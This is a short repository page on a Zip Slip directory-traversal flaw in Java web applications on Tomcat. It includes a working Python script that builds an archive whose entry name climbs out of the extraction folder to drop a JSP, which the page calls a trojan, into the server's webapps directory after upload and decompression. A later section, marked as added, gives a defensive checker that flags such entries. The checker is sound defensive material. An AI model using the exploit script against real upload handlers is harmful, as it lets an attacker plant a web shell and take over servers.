
jas502n / Java-Compressed-file-security

Licence: other
Java web compressed-file security vulnerability


Java-Compressed-file-security: Java web compressed-file security vulnerability

Test environment:

Windows For Apache Tomcat/8.5.16

0x01 Creating a directory-traversal malicious archive

Code:

# coding=utf-8

import zipfile

if __name__ == "__main__":
    # Read the JSP to embed; binary mode keeps its bytes unchanged.
    with open("404.jsp", "rb") as f:
        binary = f.read()

    # The entry name carries a "..\" component, so an extractor that joins
    # entry names onto its output directory without checking writes outside it.
    with zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED) as zipFile:
        zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)

0x02 Upload the file and click decompress; the trojan file is extracted into the site's webapps directory
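
A check for the defending side, as an added example that is not part of the original repository: before extraction, list the entries whose names would resolve outside the destination directory. The destination `/srv/upload/unpacked`, the function names and the in-memory sample archive are assumptions constructed for illustration.

```python
import io
import posixpath
import zipfile


def unsafe_entries(archive, dest_root="/srv/upload/unpacked"):
    """Return entry names that would resolve outside dest_root when extracted.

    dest_root is a hypothetical destination used only for path arithmetic;
    nothing is read from or written to disk.
    """
    bad = []
    prefix = dest_root.rstrip("/") + "/"
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            # Treat "\" as a separator too: Windows extractors do, and the
            # entry built on this page is written with backslashes.
            name = info.filename.replace("\\", "/")
            # Absolute and drive-letter paths ignore the destination entirely.
            if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
                bad.append(info.filename)
                continue
            # Collapse ".." components and require the result to stay inside.
            resolved = posixpath.normpath(posixpath.join(dest_root, name))
            if not resolved.startswith(prefix):
                bad.append(info.filename)
    return bad


def build_sample():
    """Constructed in-memory archive: one benign entry, one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("docs/readme.txt", b"benign")
        # Same entry name as the page's script, with placeholder content.
        zf.writestr(zipfile.ZipInfo("..\\webapps\\ROOT\\404.jsp"), b"placeholder")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    flagged = unsafe_entries(build_sample())
    print("rejected entries:", flagged)
```

An upload handler should reject the whole archive when this list is non-empty, and the Java code that performs the extraction needs the equivalent test: resolve each entry against the destination and refuse any canonical path that does not stay under it.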
